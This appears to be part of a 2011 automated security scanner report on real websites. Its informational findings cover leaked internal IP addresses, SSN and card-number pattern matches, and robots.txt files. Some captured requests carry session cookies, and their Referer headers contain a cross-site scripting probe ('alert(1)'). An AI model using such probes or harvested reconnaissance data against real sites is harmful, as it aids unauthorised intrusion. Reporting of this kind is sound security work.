Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; s_sq=%5B%5BB%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; s_nr=1315328331917-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: vpc=1; expires=Fri, 03-Sep-2021 11:58:56 GMT; path=/; domain=.vonage.com
Set-Cookie: oa_event=1; path=/; domain=.vonage.com
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:58:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--10.50.196.202-->
...[SNIP]...

19.76. http://www.vonage.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:52:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--10.50.196.196-->
...[SNIP]...

19.77. http://www.vonage.com/googlesearch/cluster.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /googlesearch/cluster.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /googlesearch/cluster.js HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:59 GMT
Server: Apache
Last-Modified: Thu, 25 Sep 2008 20:21:35 GMT
ETag: "a54bb2-14b2-457be25b711c0"
Accept-Ranges: bytes
Content-Length: 5298
Content-Type: application/javascript

// Copyright 2006 Google Inc., All Rights Reserved
// dspencer@google.com

// Modified to support XML response from GSA
// 2008-03-27
// bdanbury@vonage.com

/**
* @fileoverview
*
* This file is f
...[SNIP]...
put=xml_no_dtd&sort=date%3AD%3AL%3Ad1&
* ie=UTF-8&btnG=Google+Search&client=f7&q=china&ud=1&
* site=default_collection&oe=UTF-8&proxystylesheet=f7&
* ip=172.18.68.100"
*
* @param {Function} render: The rendering function which is called on
* completion with 2 arguments, the search URL (the arg above) and the XML
* that comes back from the CS.
*
*/
f
...[SNIP]...

19.78. http://www.vonage.com/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /search.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:58:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--10.50.196.202-->
...[SNIP]...

19.79. http://www.whitefence.com/static/Seymour.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /static/Seymour.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static/Seymour.js HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4
If-None-Match: "2b8556-49fd-4ca50d35"
If-Modified-Since: Thu, 30 Sep 2010 22:20:37 GMT

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:56 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 11:51:56 GMT
Last-Modified: Thu, 30 Sep 2010 22:20:37 GMT
ETag: "192a56-49fd-4ca50d35"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 18941

/*
   Package: Seymour
       Revision $Id: Seymour.js 10919 2010-01-29 16:25:17Z evan $

       Native javascript client-side frontend for Skinner webservice. It uses no specific frameworks,
       and should be com
...[SNIP]...
seconds) allowed for a callback response, defaults to 5 seconds
       timeOut: 5000,
       // skinner web service to which all requests are sent, defaults to the load-balanced production instance.
       //url: '//10.0.0.139/cgi-bin/skinner.dll', // build-test skinner (on Tennessee)
       url: '//www.whitefence.com/scripts/server/skinner.php', // external skinner
//url: '//www.whitefence.com/cgi-bin/skinner.dl
...[SNIP]...

20. Social security numbers disclosed

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/asset/coreuiConcatMin.js

Issue detail

The following social security numbers were disclosed in the response:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

Request

GET /tool/2011.09.01.19.07/asset/coreuiConcatMin.js HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:03 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Vary: Accept-Encoding
Accept-Ranges: bytes
Last-Modified: Fri, 02 Sep 2011 00:23:32 GMT
Content-Length: 610876

var Base=function(){};
Base.extend=function(_instance,_static){var extend=Base.prototype.extend;
Base._prototyping=true;
var proto=new this;
extend.call(proto,_instance);
delete Base._prototyping;
var
...[SNIP]...
\.\d{1,3})? *%?$/;
if(value>0&&numRegex.test(value)){return(value)
}},null,"checkPercentage");
oh.utils.validators.checkSSN=new oh.Validator(function(value){var badSSNcounter=0;
var badSSNs=new Array("111-11-1111","111-11-1111","111111111","222-22-2222","222222222","333-33-3333","333333333","444-44-4444","444444444","555-55-5555","555555555","666-66-6666","666666666","777-77-7777","777777777","888-88-8888","888888888","999-99-9999","999999999","000-00-0000","000000000","123-45-6789","123456789","987-65-4321","987654321");
for(i=0;
i<badSSNs.length;
i++){if(badSSNs[i]==value){badSSNcounter++
}}if(badSSNcounter==0){return value
}},null,"checkSSN");
oh.utils.validators.validDateAtL
...[SNIP]...

21. Credit card numbers disclosed
There are 3 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


21.1. http://ad.doubleclick.net/adj/myfitv.com/z300x250

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/myfitv.com/z300x250

Issue detail

The following credit card number was disclosed in the response:

Request

GET /adj/myfitv.com/z300x250;sz=300x250;qcseg=D;qcseg=T;ord=6532909198404564? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Date: Tue, 06 Sep 2011 12:55:51 GMT
Server: cafe
Cache-Control: private
Content-Length: 5379
X-XSS-Protection: 1; mode=block

function googleAdSlot(id, contents) {this.id_ = id;this.contents_ = contents;this.loaded_ = false;}function addAdSenseContent(w, slot_id, content) {var params_map = w['google_slot_contents'] ||(w['goo
...[SNIP]...
3e\x3cbody leftMargin\x3d\x220\x22 topMargin\x3d\x220\x22 marginwidth\x3d\x220\x22 marginheight\x3d\x220\x22\x3e\x3cscript type\x3d\x22text/javascript\x22 src\x3d\x22http://altfarm.mediaplex.com/ad/js/3484-103250-2056-0?mpt\x3d2134103751\x26mpvc\x3dhttp://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAw
...[SNIP]...

21.2. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Issue detail

The following credit card number was disclosed in the response:

Request

GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:55:55 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:13:06 GMT
ETag: "3ecbcf-c0b-4870f8e26a880"
Accept-Ranges: bytes
Content-Length: 9678
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
A6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3Dhttp://altfarm.mediaplex.com/ad/ck/3484-103250-2056-0?mpt=2134103751\" target=\"_blank\">
...[SNIP]...

21.3. http://search.yahoo.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /search

Issue detail

The following credit card number was disclosed in the response:

Request

GET /search;_ylt=Ajuek99xQM0_yZ.DABRjfVXSrYZ4?p=xss&fr=ush-sports HTTP/1.1
Host: search.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 35648

<!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>var pL=0, pUrl='http://ybinst2.ec.yimg.com/ec/fd/ls/l?IG=4a06753073d74d7bba4e661638f5b66
...[SNIP]...
<a href="/r/_ylt=A0oGdSM4FmZOumQALEpXNyoA/SIG=17uup1k9g/EXP=1315342008/**http%3a//74.6.117.48/search/srpcache%3fei=UTF-8%26p=xss%26fr=ush-sports%26u=http%3a//cc.bingj.com/cache.aspx%3fq=xss%26d=5006776799396518%26mkt=en-US%26setlang=en-US%26w=f93bddf,445ecc43%26icp=1%26.intl=us%26sig=Ii.Q59SNBGV5tSu9TaCbrw--" data-bk="5087.1">
...[SNIP]...

22. Robots.txt file
There are 100 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


22.1. http://533-rgz-601.mktoresp.com/webevents/visitWebPage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://533-rgz-601.mktoresp.com
Path:   /webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 533-rgz-601.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:21 GMT
ETag: "a18024-18-4a7853ce56c40"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.2. http://a.adready.com/campaign_event/impression

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.adready.com
Path:   /campaign_event/impression

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.adready.com

Response

HTTP/1.0 200 OK
Status: 200 OK
Last-Modified: Thu, 18 Aug 2011 02:03:07 GMT
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 12:45:38 GMT
Content-Length: 1022
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /session/
Disallow: /ABC/
Disallow: /images/ # hides .swfs with indexable t
...[SNIP]...

22.3. http://a.analytics.yahoo.com/fpc.pl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.analytics.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: public, max-age=86400
Last-Modified: Tue, 21 Jun 2011 13:20:59 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

22.4. http://ad.turn.com/server/ads.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 12:44:53 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

22.5. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:24:25 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:24:25 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

22.6. http://ads.bluelithium.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /iframe3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.bluelithium.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:29:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:29:49 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

22.7. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:1718"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:45:11 GMT
Connection: close

User-agent: *
Disallow: /

22.8. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1310681018000"
Last-Modified: Thu, 14 Jul 2011 22:03:38 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 12:48:07 GMT
Connection: close

User-agent: *
Disallow: /

22.9. http://altfarm.mediaplex.com/ad/js/3484-103250-2056-0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3484-103250-2056-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1158796162000"
Last-Modified: Wed, 20 Sep 2006 23:49:22 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 12:55:54 GMT
Connection: keep-alive

User-agent: *
Disallow: /

22.10. http://api.facebook.com/restserver.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Thu, 06 Oct 2011 12:49:45 GMT
X-FB-Server: 10.28.5.127
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

22.11. http://api.recaptcha.net/challenge

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.recaptcha.net
Path:   /challenge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.recaptcha.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:26:51 GMT
Expires: Tue, 06 Sep 2011 12:26:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

22.12. http://as.casalemedia.com/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Tue, 06 Sep 2011 12:45:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:57 GMT
Connection: close

User-agent: *
Disallow: /

22.13. http://as1.suitesmart.com/99917/G15493.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /99917/G15493.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as1.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e36-1a-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close
Cache-Control: no-store

User-agent: *
Disallow: /

22.14. http://autos.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: autos.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 03 Dec 2007 22:46:32 GMT
Accept-Ranges: bytes
Content-Length: 33
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Age: 0
Server: YTS/1.19.5

User-agent: Vast_Bot
Disallow: /

22.15. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 07 Sep 2011 12:45:57 GMT
Date: Tue, 06 Sep 2011 12:45:57 GMT
Connection: close
